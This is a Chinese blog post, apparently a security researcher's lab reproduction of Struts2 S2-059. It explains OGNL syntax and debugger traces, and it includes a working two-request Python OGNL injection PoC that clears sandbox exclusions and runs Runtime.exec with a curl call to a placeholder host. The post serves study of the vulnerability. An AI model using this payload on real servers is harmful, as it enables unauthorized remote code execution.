<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-cn">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="web,java,Struts2," />










<meta name="description" content="s2-059的漏洞复现">
<meta property="og:type" content="article">
<meta property="og:title" content="s2059复现">
<meta property="og:url" content="http://www.star123.top/2020/12/12/s2059%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="star&#39;s blog">
<meta property="og:description" content="s2-059的漏洞复现">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i.loli.net/2020/12/12/PkI9bEHZjLY8VBD.png">
<meta property="og:image" content="https://i.loli.net/2020/12/12/QVjWzi65CUNKwpd.png">
<meta property="og:image" content="https://i.loli.net/2020/12/12/N9E52wZQeLY1zAD.png">
<meta property="og:image" content="https://i.loli.net/2020/12/12/XJedV7HgAinhUrw.png">
<meta property="og:image" content="https://i.loli.net/2020/12/12/p9MfrqJiFEhAkRn.png">
<meta property="og:image" content="https://i.loli.net/2020/12/13/tluDI8aFn5PfNyV.png">
<meta property="article:published_time" content="2020-12-12T12:14:06.270Z">
<meta property="article:modified_time" content="2021-01-24T11:55:48.868Z">
<meta property="article:author" content="star">
<meta property="article:tag" content="web">
<meta property="article:tag" content="java">
<meta property="article:tag" content="Struts2">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2020/12/12/PkI9bEHZjLY8VBD.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://www.star123.top/2020/12/12/s2059复现/"/>





  <title>s2059复现 | star's blog</title>
  








<meta name="generator" content="Hexo 4.2.1"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-cn">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">star's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://www.star123.top/2020/12/12/s2059%E5%A4%8D%E7%8E%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="star">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="star's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">s2059复现</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-12-12T20:14:06+08:00">
                2020-12-12
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>s2-059的漏洞复现</p>
<a id="more"></a>

<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>s2-059的漏洞复现</p>
<h2 id="背景介绍"><a href="#背景介绍" class="headerlink" title="背景介绍"></a>背景介绍</h2><ul>
<li>这篇文章归纳了s2 ongl漏洞的历史绕过方式 <a href="https://www.anquanke.com/post/id/169735#h3-4" target="_blank" rel="noopener">浅析OGNL的攻防史</a>,s2059的沙盒绕过方式实际上是通过第一个请求重置OgnlUtil对象的excludedPackageNamePatterns，excludedClasses等属性来回到Struts 2.3.29前的情况，之后通过允许静态方法访问，来执行java.lang.Runtime.getRuntime().exec方法。</li>
<li>s2059是源于对s标签中id属性的解析。</li>
</ul>
<h2 id="Ognl语言介绍"><a href="#Ognl语言介绍" class="headerlink" title="Ognl语言介绍"></a>Ognl语言介绍</h2><ol>
<li>使用#来访问对象，不使用#会直接访问基本类型变量。#name ,取值为name对象。</li>
<li>@来访问静态方法。@java.lang.math@max(10,2) 结果10</li>
<li> new int[]{1,2,3}直接创建数组，或者{1,2,3}直接创建数组。new int[]{1,2,3}[0]  结果: 1</li>
<li>xxx,xxx，<code>,</code>分割不同的表达式xxx。new int[]{1},1  结果：1</li>
<li>#{‘user’:’1’,’user1’:2}来创建新的对象。</li>
<li>= 可以直接赋值。#s1=1 </li>
<li> 调用方法的方式和正常情况下一样，使用.即可。</li>
<li>使用.{xxx}来选择元素<ul>
<li>#s1={‘12’,’23’,1},#s1.{<code>#</code>this}，选择全部元素。</li>
<li>#s1={‘12’,’23’,1},#s1.{^#this.length()==2}，选择第一个元素’12’。</li>
<li>#s1={‘12’,’23’,1},#s1.{?#this instanceof String} 选择全部满足条件的元素，’12’,’23’。</li>
</ul>
</li>
<li>如果对象存在get或者set方法 ongl允许通过xxx.attr来访问或者xxx[‘attr’]=xx来设置元素的值。</li>
<li>1 in {1,2} 和python的用法一样。</li>
</ol>
<h2 id="复现环境"><a href="#复现环境" class="headerlink" title="复现环境"></a>复现环境</h2><ul>
<li>使用vulhub的s2-059环境，直接使用mvn自带的jerry启动调试模式，jdk8</li>
</ul>
<h2 id="调试过程"><a href="#调试过程" class="headerlink" title="调试过程"></a>调试过程</h2><ul>
<li><p>index.jsp，直接使用vulhub的poc打</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&lt;%@ page</span><br><span class="line">        language=<span class="string">"java"</span></span><br><span class="line">        contentType=<span class="string">"text/html; charset=UTF-8"</span></span><br><span class="line">        pageEncoding=<span class="string">"UTF-8"</span> %&gt;</span><br><span class="line">&lt;%@ taglib prefix=<span class="string">"s"</span> uri=<span class="string">"/struts-tags"</span> %&gt;</span><br><span class="line"></span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;title&gt;S2-059 demo&lt;/title&gt;</span><br><span class="line"></span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;s:a id=<span class="string">"%&#123;id&#125;"</span>&gt;your input id: $&#123;id&#125;</span><br><span class="line">    &lt;br&gt;has ben evaluated again in id attribute</span><br><span class="line">&lt;/s:a&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>



</li>
</ul>
  <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> urllib.parse <span class="keyword">import</span> quote</span><br><span class="line">url = <span class="string">"http://yourip:port/"</span></span><br><span class="line">data1 =<span class="string">b"%&#123;(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))&#125;"</span></span><br><span class="line">data2 =<span class="string">b"%&#123;(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('curl http://yourip:port/dasd'))&#125;"</span></span><br><span class="line">res1 = requests.get(url+<span class="string">'?id='</span>+quote(data1))</span><br><span class="line">print(res1.text)</span><br><span class="line">res2 = requests.get(url+<span class="string">'?id='</span>+quote(data2))</span><br><span class="line">print(res2.text)</span><br></pre></td></tr></table></figure>



<ul>
<li><p>启动过程中在setExcludedClasses方法下断点</p>
<p><img src="https://i.loli.net/2020/12/12/PkI9bEHZjLY8VBD.png" alt="image-20201212230203013"></p>
</li>
<li><p>在setExcludedPackageNames方法下断点</p>
<p><img src="https://i.loli.net/2020/12/12/QVjWzi65CUNKwpd.png" alt="image-20201212230356120"></p>
</li>
<li><p>打过poc后在ognl.ASTChain的86行，一直f9直到返回的result到20几个的时候，这边的poc主要是获取attr对象中的struts.valueStack中的context，按照poc依次存储context，通过context获取com.opensymphony.xwork2.ActionContext.container，也就是当前上下文中container，最后通过getInstance方法获取ognlUtil对象。最终目的是重置ognlUtil对象中的ExcludedPackageNames和ExcludedClasses。</p>
<p><img src="https://i.loli.net/2020/12/12/N9E52wZQeLY1zAD.png" alt="image-20201212233448628"></p>
</li>
<li><p>接着第二次请求，需要注意的是，整个流程没法依次完成，如果第一次就直接执行接下来的语句就会报stackoverflow的异常。</p>
<p><img src="https://i.loli.net/2020/12/12/XJedV7HgAinhUrw.png" alt="image-20201212235419561"></p>
</li>
<li><p>最终能够调用静态方法，直接java.lang.Runtime.getRuntime().exec()</p>
<p><img src="https://i.loli.net/2020/12/12/p9MfrqJiFEhAkRn.png" alt="image-20201212235839008"></p>
</li>
<li><p>现在回过头来看下为啥只有id被解析了。</p>
<p>最后一个断点下载Component类的150行的方法上，看下调用堆栈。</p>
<p><img src="https://i.loli.net/2020/12/13/tluDI8aFn5PfNyV.png" alt="image-20201213000517083"></p>
</li>
<li><p>很明确解析表达式的条件是开启altSyntax，当前版本这个默认是关闭的，而且按照这里的containsExpression，表达式必须是%{xxx}才行。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">protected</span> Object <span class="title">findValue</span><span class="params">(String expr, Class toType)</span> </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="keyword">this</span>.altSyntax() &amp;&amp; toType == String<span class="class">.<span class="keyword">class</span>) </span>&#123;</span><br><span class="line">            <span class="keyword">return</span> ComponentUtils.containsExpression(expr) ? TextParseUtil.translateVariables(<span class="string">'%'</span>, expr, <span class="keyword">this</span>.stack) : expr;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            expr = <span class="keyword">this</span>.stripExpressionIfAltSyntax(expr);</span><br><span class="line">            <span class="keyword">return</span> <span class="keyword">this</span>.getStack().findValue(expr, toType, <span class="keyword">this</span>.throwExceptionOnELFailure);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">boolean</span> <span class="title">containsExpression</span><span class="params">(String expr)</span> </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> expr != <span class="keyword">null</span> &amp;&amp; expr.contains(<span class="string">"%&#123;"</span>) &amp;&amp; expr.contains(<span class="string">"&#125;"</span>);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>影响范围包括UIBean所有使用setId的tag，需要注意的是这边有递归解析限制。</p>
</li>
</ul>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>感觉这个洞需要结合白盒分析利用，看上去不是特别厉害。不过绕Ognl的思路真的很值得细细研究。</p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><ol>
<li><a href="https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247484472&idx=1&sn=35c122ea5f7dbbcc302f0a88cea70ac6&scene=21#wechat_redirect" target="_blank" rel="noopener">s2-059 smile分析</a></li>
<li><a href="https://www.anquanke.com/post/id/169735#h3-15" target="_blank" rel="noopener">Ognl绕过历史介绍</a></li>
<li><a href="https://www.anquanke.com/post/id/216629#h2-4" target="_blank" rel="noopener">参考了回显poc,但复现失败</a></li>
</ol>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/web/" rel="tag"># web</a>
          
            <a href="/tags/java/" rel="tag"># java</a>
          
            <a href="/tags/Struts2/" rel="tag"># Struts2</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/12/12/java%E5%86%85%E5%AD%98shell%E5%AD%A6%E4%B9%A0/" rel="next" title="java内存shell学习">
                <i class="fa fa-chevron-left"></i> java内存shell学习
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/12/13/s2061%E5%A4%8D%E7%8E%B0/" rel="prev" title="s2061复现">
                s2061复现 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">star</p>
              <p class="site-description motion-element" itemprop="description">ctf wp and technologies about security</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%20%7C%7C%20archive">
              
                  <span class="site-state-item-count">48</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">32</span>
                  <span class="site-state-item-name">tags</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#背景介绍"><span class="nav-number">2.</span> <span class="nav-text">背景介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Ognl语言介绍"><span class="nav-number">3.</span> <span class="nav-text">Ognl语言介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#复现环境"><span class="nav-number">4.</span> <span class="nav-text">复现环境</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#调试过程"><span class="nav-number">5.</span> <span class="nav-text">调试过程</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#总结"><span class="nav-number">6.</span> <span class="nav-text">总结</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考"><span class="nav-number">7.</span> <span class="nav-text">参考</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">star</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
